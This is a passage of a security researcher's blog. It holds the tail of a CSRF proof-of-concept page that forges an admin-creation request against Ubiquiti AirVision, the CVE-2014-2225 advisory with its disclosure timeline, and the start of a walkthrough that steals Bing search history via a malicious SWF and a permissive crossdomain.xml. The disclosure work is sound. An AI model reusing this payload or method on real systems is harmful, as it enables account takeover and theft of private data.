xmlhttp.withCredentials<span style="color: #666666;">=</span> <span style="color: #bb4444;">"true"</span>;
xmlhttp.send(post_data);
}
<span style="color: green; font-weight: bold;"></script></span>
<span style="color: green; font-weight: bold;"></head></span>
<span style="color: green; font-weight: bold;"><body></span>
<span style="color: green; font-weight: bold;"><h1></span>CSRF POC<span style="color: green; font-weight: bold;"></h1></span>
Sending CSRF Payload!!!
<span style="color: green; font-weight: bold;"><body</span> <span style="color: #bb4444;">onload="sendCSRF()"</span><span style="color: green; font-weight: bold;">></span>
<span style="color: green; font-weight: bold;"></body></span></pre>
<pre><span style="color: green; font-weight: bold;"></html></span></pre>
</div>
<span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;"><br /></span><span style="font-family: Calibri; font-size: 15px; line-height: 1; white-space: pre-wrap;">Here is a proxy view from the perspective of the victim Admin</span></div>
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">First the admin’s browser goes to </span><a href="http://www.malicous-site.com/" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicous-site.com</span></a><span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;"> and pulls the attackers CSRF payload page</span></div>
</li>
<li dir="ltr" style="font-family: Arial; font-size: 15px; list-style-type: disc; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.0791; margin-bottom: 8pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; vertical-align: baseline; white-space: pre-wrap;">Then the admin’s browser loads the forged request that will add another admin on the AirVision Controller</span></div>
</li>
</ul>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="97" src="https://lh3.googleusercontent.com/wf3uonn4Z0HhC_AvWYK-U_1NFUrQdXDldgNEyIddNzPRF5SGWWLMjlFjPl302PZ-4I1NCuhtVKCuqkHzpbaPX9AX6zORfSbV1ovhYwqrpkcv1HxTVqUe5rLLQjdOgszlS6pKyyKRPvI" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The forged request is shown below. You can see that the Referrer is </span><a href="http://www.malicious-site.com/csrf-airvision4.html" style="text-decoration: none;"><span style="color: #0563c1; font-family: Calibri; font-size: 15px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.malicious-site.com/csrf-airvision4.html</span></a><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">, and not the AirVision Controller. However, because of Same Origin Policy, when the admin makes the request to the AirVision Controller, the browser attaches the admin’s valid session cookie:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="336" src="https://lh6.googleusercontent.com/XMcQZjeBHC76nT3F0pXyBVZ5fKAfag7Sc_BKkNXKuwH49biOMJqNfuLE88_sLeFrGIH561SLFiprHelJ0hZI0htXFtt-l2hDDpeNiM5gS8CDtQD--MrAyhBodfRkGXge4sfDAJSGnhk" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">The response, showing the new admin was created successfully:</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="242" src="https://lh6.googleusercontent.com/3-YwJAR-FCLnB_4kwwcXTclG7ur2ZgxKlRhMn50eed8blyIRTTBUv149pMcUMG1TatTu0XxQwrRiCz8_QbSnO7tLSDj6sXg9NHYvS44PBwIa9FB9UTBLC7c9z01IxHfk0zyOzcm4PVo" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;">Settings >> System (After CSRF attack) – The attacker logging in with the new credentials</span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: Calibri; font-size: 15px; vertical-align: baseline; white-space: pre-wrap;"><img height="361" src="https://lh6.googleusercontent.com/vHDhNkNICfE31xqVJkLn9q0jXXjbtoWKt2vE6tZ5ihx1HLTzD32dvC4hQp8LyBlrPchMyAZPLOQLj_-chLYa4HqYRJEeBk9TZ1VUlvYjgK5cjkhJQwGbYs1uYn3l_zHlYFq0Tl-F0xU" style="-webkit-transform: rotate(0rad); border: currentColor;" width="624" /></span></div>
</div>
<div>
<br /></div>
<div dir="ltr" style="margin-left: 0pt;">
Additional details:</div>
<div dir="ltr" style="margin-left: 0pt;">
<br /></div>
<div dir="ltr" style="margin-left: 0pt;">
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c"></span><br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">(CVE-2014-2225) - Ubiquiti Networks - Multiple products - Cross-site Request Forgery (CSRF)</span></span></div>
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c">
</span><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c"><span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></span></div>
<span id="docs-internal-guid-86a880ed-6565-adef-32ea-45db0c27472c">
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Vendor: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Ubiquiti Networks (http://www.ubnt.com/)</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Affected Products/Versions: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller v2.4.6</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">mFi Controller v2.0.15</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller v2.1.3</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Note: Previous versions may be affected</span></div>
<br /><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Description:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Title: Cross-site Request Forgery (CSRF)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE: CVE-2014-2225</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CWE: CWE-352: </span><a href="http://cwe.mitre.org/data/definitions/352.html" style="text-decoration: none;"><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">http://cwe.mitre.org/data/definitions/352.html</span></a></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Researcher: Seth Art - @sethsec</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Detailed writeup (includes screenshots): </span><a href="http://sethsec.blogspot.com/2014/07/cve-2014-2225.html" style="text-decoration: none;"><span style="background-color: white; color: #1155cc; font-family: Arial; font-size: 13px; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">http://sethsec.blogspot.com/2014/07/cve-2014-2225.html</span></a><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"> </span></div>
</span><br /></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Solution:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">mFi Controller - Upgrade to mFi Controller v2.0.24 or greater</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater </span><span style="font-family: Arial; font-size: 13px; line-height: 14px; white-space: pre-wrap;">(Note: The application name changed from AirVision to UniFi Video)</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">Disclosure Timeline: </span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">-----------------------------</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-16: Notified Ubiquiti of vulnerabilities in UniFi and mFi products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Ubiquiti acknowledges and requests details</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-17: Report with POC sent to Ubiquiti</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Asked Ubiquiti to confirm receipt of report</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquti confirms receipt of report and existence of the vulnerabilities</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-25: Notified Ubiquiti of CSRF vulnerability in AirVision product</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-19: Ubiquti confirms receipt of AirVision report and existence of the vulnerability</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-02-28: </span><span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">CVE-2014-2225 assigned</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-12: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-03-27: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-07: Requested status update</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-09: Ubiquiti provides timeline for solution</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-04-18: UniFi Video 3.0.1 is released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-05-30: Requested a status update on the remaining two products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: Requested a status update on the remaining two products</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-12: mFi v2.0.24 and UniFi 3.2.1 are released</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-06-13: Set public disclosure date of 2014-07-24 and notified vendor</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;">2014-07-24: Public disclosure</span></div>
<div>
<span style="background-color: white; color: #222222; font-family: Arial; font-size: 13px; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
Seth Arthttp://www.blogger.com/profile/05253599496757968918noreply@blogger.com0tag:blogger.com,1999:blog-5890567984672491244.post-39614845699779390622014-07-17T23:55:00.000-04:002016-10-17T10:42:01.656-04:00Real world exploitation of a misconfigured crossdomain.xml - Bing.comIn my <a href="http://sethsec.blogspot.com/2014/03/exploiting-misconfigured-crossdomainxml.html" target="_blank">previous</a> <a href="http://sethsec.blogspot.com/2014/03/exploiting-insecure-crossdomain.html" target="_blank">two</a> posts, I explain the overly permissive crossdomain.xml vulnerability, show you how to create malicious SWF files from scratch, and show you how to use the malicious SWFs to exploit the vulnerability. <br />
<br />
As we all know, sometimes the best way to wrap your head around a vulnerability is to see it being exploited. Rather than continuing to talk about the vulnerability in theoretical terms, I can now start to share some specific examples.<br />
<div>
<br /></div>
<div>
Microsoft has closed out my MSRC case, so I can share how I was able to exploit the crossdomain.xml file at www.bing.com, and land on their <i><a href="http://technet.microsoft.com/en-us/security/cc308575#0414" target="_blank">Security Researcher Acknowledgements for Microsoft Online Services</a></i> page (a first for me).<br />
<br />
<b><u>Misuse Case - Gaining access to a Bing.com user's saved search history</u></b></div>
<div>
<br /></div>
<div>
<span style="color: blue;">If the victim user is authenticated with any live.com linked account (msn, outlook, etc), and they visit a malicious site, the owner of the malicious site can retrieve the victim user’s entire search history, including the sites they visited by way of the search engine. </span><i><span style="font-size: x-small;"> </span></i></div>
<div>
<br />
<b><u>The vulnerable configuration (fixed now):</u></b></div>
<div class="separator" style="clear: both; text-align: center;">
<span id="docs-internal-guid-18cb2e99-8a8e-6a84-30d0-5e7ab7afd6a0" style="margin-left: 1em; margin-right: 1em;"><img height="219" src="https://lh4.googleusercontent.com/ybEcADaHZMEIpfVlpd1BI2l81i1xIrzaMADMAC3cNNAboOUHXj8lwmjwjpB4JFAxXEvybg7wRDi9vKnps8qj1Di41nBGjnqSXBJHsNpyu0Ge6N-c89B_NHFwchqh0STU_sSQT63B8W0" style="-webkit-transform: rotate(0rad); border: currentColor;" width="533" /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="margin-left: 1em; margin-right: 1em;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit; font-weight: bold; line-height: 1; text-decoration: underline; white-space: pre-wrap;">Proof of Concept</span></div>
<strong>Note:</strong> In the proof of concept, I show the attack from the perspective of the victim. <span style="color: blue;"> Unlike a real exploitation, the "victim" is going through Burp to illustrate what is going on behind the scenes.</span> <br />
<div class="separator" style="clear: both; text-align: left;">
<b id="docs-internal-guid-18cb2e99-8a90-4a62-e7fd-d6cbdcf09966" style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b><span style="font-family: inherit; line-height: 1;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Prerequisite:</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> The victim is currently authenticated with msn.com, live.com, bing.com, etc. </span></span><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;">This is a screenshot of the </span></span><span style="line-height: 16px; white-space: pre-wrap;">victim</span><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;"> logged in and viewing the information that we (the attacker) are going </span></span><span style="line-height: 16px; white-space: pre-wrap;">to</span> steal<span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;">. </span></span><span style="line-height: 16px; white-space: pre-wrap;">The victim does not need to be on this particular page for the attack to work. </span></div>
<div style="line-height: 1;">
</div>
<div class="separator" style="clear: both; line-height: 1; text-align: center;">
<a href="http://1.bp.blogspot.com/-SE9zoOOIOyU/U2FlXkID48I/AAAAAAAAAN0/KdQYH9YxNEY/s1600/2014-04-30+17_01_12-Bing+Search+History.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="507" src="https://1.bp.blogspot.com/-SE9zoOOIOyU/U2FlXkID48I/AAAAAAAAAN0/KdQYH9YxNEY/s1600/2014-04-30+17_01_12-Bing+Search+History.png" width="640" /></a></div>
<div style="line-height: 1;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: bold; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 1:</span><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> Attacker hosts a malicious SWF on his/her server, and socially engineers a victim to arrive at the attacker’s site. </span></span><br />
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: inherit; font-style: normal; font-variant: normal; font-weight: bold; line-height: 1; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 2:</span><span style="background-color: transparent; vertical-align: baseline;"><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;"> The victim, while logged into msn.com, live.com, bing.com, etc, loads the </span></span><span style="line-height: 16px; white-space: pre-wrap;">malicious html page</span><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;">:</span></span></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span id="docs-internal-guid-18cb2e99-8ab7-98ab-852e-69a0e08ac2c2" style="margin-left: 1em; margin-right: 1em;"><img height="110" src="https://lh3.googleusercontent.com/Q9552FSSfatESjWXK9iGNgDE9einj9siOZ1QgxE2xwOUzRPD2jSRBebCmpaC55e9AE66EiaGRPDcahIZPEjv97_TtD0fwS2VJOBdPHwO0iIOziM8H1pq8PJpMDRt02FT_Q" style="-webkit-transform: rotate(0rad); border: currentColor;" width="597" /></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="font-family: inherit;"><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span><br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
As you can see, the POC html page just instructs the victim's browser to execute the SWF file. </div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="312" src="https://lh4.googleusercontent.com/GrciJiySH4NGz9pW6tA1RMYvzzqx0gritX8S11Lz35vqFpa3z8bJloJz6PdqAZbb3PGms9Wgn8F1GFshdCHlGMUuComnhMPXw2miUDX_7il5Kr9cszWXLz8u3ZlVARicMkRfQAhcrN0" style="-webkit-transform: rotate(0rad); border: currentColor;" width="529" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<span style="font-family: inherit; font-weight: bold; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">Step 3:</span><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> The victims browser downloads and loads the SWF</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="407" src="https://lh5.googleusercontent.com/cwcfBvn51xb9S26daLLB0Fz18uE_Ol761sERzOxhBXQA2enIMfyfYO4nUlZTxJLXQfWBzUO4FJUiSPk0pDg5DfyXXR-S78m1eYwTufcnpw5dW_4GV6gYPRLVq-QdriGarGN22kgJ3aw" style="-webkit-transform: rotate(0rad); border: currentColor;" width="542" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div dir="ltr" style="margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-family: inherit; font-style: normal; font-variant: normal; font-weight: bold; line-height: 1; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Step 4:</span><span style="background-color: transparent; font-family: inherit; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> The SWF, now loaded in the browser, makes a request to </span><span style="background-color: transparent; font-family: inherit; font-style: normal; font-variant: normal; font-weight: normal; line-height: 1; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="https://www.bing.com/crossdomain.xml" style="text-decoration: none;">https://www.bing.com/crossdomain.xml</a></span><span style="background-color: transparent; vertical-align: baseline;"><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;">. This is where the vulnerability lies. If the crossdomain.xml file at www.bing.com is set correctly, the Adobe </span></span><span style="line-height: 16px; white-space: pre-wrap;">Flash</span><span style="font-family: inherit;"><span style="line-height: 1; white-space: pre-wrap;"> player won't let the SWF proceed. When the crossdomain.xml file is overly permissive, it instructs the SWF file that it is authorized to interact with the domain (www.bing.com). </span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: inherit; margin-left: 1em; margin-right: 1em;"><img height="256" src="https://lh3.googleusercontent.com/IBWJFz2_fDh2-dicjN7qOMXNyXgQv24PWirrl9YpWRKilV9_WmXy5YilP74-6yI2MMcHeZpwtDv-WsO0fT8Z3wghD0sHJLclXUsgf-CqNRNXx1g3vDi4ShL591MFc9eIImgDS4-htqE" style="-webkit-transform: rotate(0rad); border: currentColor;" width="550" /><span style="background-color: transparent; color: black; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"></span></span></div>
<div dir="ltr" style="line-height: 1; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: inherit; font-weight: bold; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">Step 5:</span><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> The SWF makes a request on behalf of the victim and retrieves the user’s search history from </span><a href="https://www.bing.com/profile/history" style="font-family: inherit; line-height: 1; text-decoration: none;"><span style="text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bing.com/profile/history</span></a><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;"> and </span><a href="https://www.bing.com/profile/history/more" style="font-family: inherit; line-height: 1; text-decoration: none;"><span style="text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">https://www.bing.com/profile/history/more</span></a><span style="font-family: inherit; line-height: 1; vertical-align: baseline; white-space: pre-wrap;">:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<b style="font-weight: normal;"><span style="font-family: inherit;"><br /></span></b></div>
<div class="separator" style="clear: both; text-align: center;">
